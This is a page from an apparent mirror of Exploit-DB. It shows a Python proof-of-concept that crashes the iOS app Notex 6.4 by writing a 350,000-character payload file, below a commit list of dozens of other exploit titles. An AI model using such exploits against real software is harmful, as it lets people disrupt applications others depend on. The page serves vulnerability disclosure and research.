bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/ios/dos/50003.py
Offensive Security f33a724e0b DB: 2021-10-29 
58 changes to exploits/shellcodes

Yenkee Hornet Gaming Mouse - 'GM312Fltr.sys' Denial of Service (PoC)
Easy CD & DVD Cover Creator 4.13 - Denial of Service (PoC)
KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Device Reboot (Unauthenticated)
ProFTPD 1.3.7a - Remote Denial of Service
glFTPd 2.11a - Remote Denial of Service
Hasura GraphQL 1.3.3 - Denial of Service
Sticky Notes & Color Widgets 1.4.2 - Denial of Service (PoC)
NBMonitor 1.6.8 - Denial of Service (PoC)
Nsauditor 3.2.3 - Denial of Service (PoC)
Sticky Notes Widget Version 3.0.6 - Denial of Service (PoC)
Secure Notepad Private Notes 3.0.3 - Denial of Service (PoC)
Post-it 5.0.1 - Denial of Service (PoC)
Notex the best notes 6.4 - Denial of Service (PoC)
SmartFTP Client 10.0.2909.0 - 'Multiple' Denial of Service (PoC)
Redragon Gaming Mouse - 'REDRAGON_MOUSE.sys' Denial of Service (PoC)
GeoGebra Graphing Calculato‪r‬ 6.0.631.0 - Denial Of Service (PoC)
GeoGebra Classic 5.0.631.0-d - Denial of Service (PoC)
GeoGebra CAS Calculato‪r‬ 6.0.631.0 - Denial of Service (PoC)
Backup Key Recovery 2.2.7 - Denial of Service (PoC)
memono Notepad Version 4.2 - Denial of Service (PoC)

Disk Sorter Enterprise 13.6.12 - 'Disk Sorter Enterprise' Unquoted Service Path

Cyberfox Web Browser 52.9.1 - Denial of Service (PoC)
KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Hard coded Credentials Shell Access
vsftpd 3.0.3 - Remote Denial of Service

Dlink DSL2750U - 'Reboot' Command Injection

PHPGurukul Hostel Management System 2.1 - Cross-site request forgery (CSRF) to Cross-site Scripting (XSS)

Netsia SEBA+ 0.16.1 - Add Root User (Metasploit)

Arteco Web Client DVR/NVR - 'SessionId' Brute Force

Resumes Management and Job Application Website 1.0 - Authentication Bypass
KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Command Injection (Authenticated)
KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Authentication Bypass
KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Remote Code Execution
KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Factory Reset (Unauthenticated)
KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Config Download (Unauthenticated)
'customhs_js_content' - 'customhs_js_content' Cross-Site Request Forgery
Regis Inventory And Monitoring System 1.0 - 'Item List' Persistent Cross-Site Scripting

rConfig 3.9.6 - Arbitrary File Upload to Remote Code Execution (Authenticated) (1)

Mini Mouse 9.3.0 - Local File inclusion

rconfig 3.9.6 - Arbitrary File Upload

Sipwise C5 NGCP CSC - 'Multiple' Persistent Cross-Site Scripting (XSS)

Rocket.Chat 3.12.1 - NoSQL Injection (Unauthenticated)

OpenEMR 5.0.1.3 - Authentication Bypass
VMware vCenter Server 7.0 - Remote Code Execution (RCE) (Unauthenticated)
WordPress Plugin Supsystic Contact Form 1.7.18 - 'label' Stored Cross-Site Scripting (XSS)

Patient Appointment Scheduler System 1.0 - Persistent Cross-Site Scripting

Apartment Visitor Management System (AVMS) 1.0 - 'username' SQL Injection
Budget and Expense Tracker System 1.0 - Authenticated Bypass
Budget and Expense Tracker System 1.0 - Remote Code Execution (RCE) (Unauthenticated)

FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - 'Add Admin' Cross-Site Request Forgery (CSRF)

WordPress Plugin Select All Categories and Taxonomies 1.3.1 - Reflected Cross-Site Scripting (XSS)

Blood Bank System 1.0 - Authentication Bypass

Lodging Reservation Management System 1.0 - Authentication Bypass

Atlassian Jira Server Data Center 8.16.0 - Arbitrary File Read

Linux/x64 - /sbin/halt -p Shellcode (51 bytes)
Linux/x86 - execve(/bin/sh) Shellcode (17 bytes)
Linux/x64 - execve(/bin/sh) Shellcode (21 bytes) (2)
Linux/x86 - execve /bin/sh Shellcode (fstenv eip GetPC technique) (70 bytes_ xor encoded)

Windows/x86 - Bind TCP shellcode / Dynamic PEB & EDT method null-free Shellcode (415 bytes)
2021-10-29 05:02:12 +00:00

36 lines
No EOL
962 B
Python
Executable file
Raw Permalink Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Exploit Title: Notex the best notes 6.4 - Denial of Service (PoC)
# Date: 06-14-2021
# Author: Geovanni Ruiz
# Download Link: https://apps.apple.com/us/app/notex-the-best-notes/id847994217
# Version: 6.4
# Category: DoS (iOS)
##### Vulnerability #####
Notex the best notes is vulnerable to a DoS condition when a long list of
characters is being used when creating a note:
# STEPS #
# Open the program.
# Create a new Note.
# Run the python exploit script payload.py, it will create a new payload.txt file
# Copy the content of the file "payload.txt"
# Paste the content from payload.txt twice in the new Note.
# Crashed
Successful exploitation will cause the application to stop working.
I have been able to test this exploit against iOS 14.2.
##### PoC #####
--> payload.py <--
#!/usr/bin/env python
buffer = "\x41" * 350000
try:
f = open("payload.txt","w")
f.write(buffer)
f.close()
print ("File created")
except:
print ("File cannot be created")
Reference in a new issue View git blame Copy permalink